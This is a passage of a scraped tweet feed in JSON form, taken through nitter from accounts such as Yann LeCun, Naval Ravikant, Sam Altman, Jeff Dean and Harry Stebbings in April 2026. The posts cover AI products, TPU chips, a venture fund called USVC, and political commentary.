planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter", + "title_zh": "@sama 转发:今天,我们开源了OpenAI的许多监控能力评估。我们希望研究社区和其他模型开发者能在此基础上进行扩展,并使用它们评估自己模型的监控能力。\n\nhttps://alignment.openai.com/monitorability-evals/" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not 